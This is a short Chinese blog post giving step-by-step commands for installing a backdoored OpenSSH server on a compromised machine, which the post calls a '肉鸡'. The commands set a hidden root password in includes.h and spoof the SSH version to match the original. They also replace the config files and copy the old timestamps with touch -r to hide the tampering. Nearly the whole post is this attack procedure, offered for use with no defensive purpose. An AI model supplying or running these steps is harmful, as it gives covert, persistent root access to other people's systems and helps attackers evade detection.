ssh后门安装方法
tar zxvf sshd.tgz
cd openssh
vi includes.h [查找PASSWD 修改你的ssh后门密码]
vi version.h [修改SSH版本,要与肉鸡一致]
./configure --prefix=/usr/ --sysconfdir=/etc/ssh [安装目录要和原来系统上的ssh一致]
make && make install
sh-3.00# mv/etc/ssh/ssh_config /etc/ssh/ssh_config.old [重命名ssh配置文件,时间戳不变,为一会拷贝时间戳做准备]
sh-3.00# mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
cp ssh_config sshd_config /etc/ssh/
touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config [拷贝原配置文件的时间戳]
touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config
rm /etc/ssh/ssh_config.old /etc/ssh/sshd_config.old
/etc/init.d/sshd restart
[这样就安装完毕了,然后就可以用putty之类的工具像正常使用ssh一样登陆你的ssh后门了]
用户名:root
密码:yourpwd 就是你在includes.h里面设置的那个
阅读(1289) | 评论(0) | 转发(0) |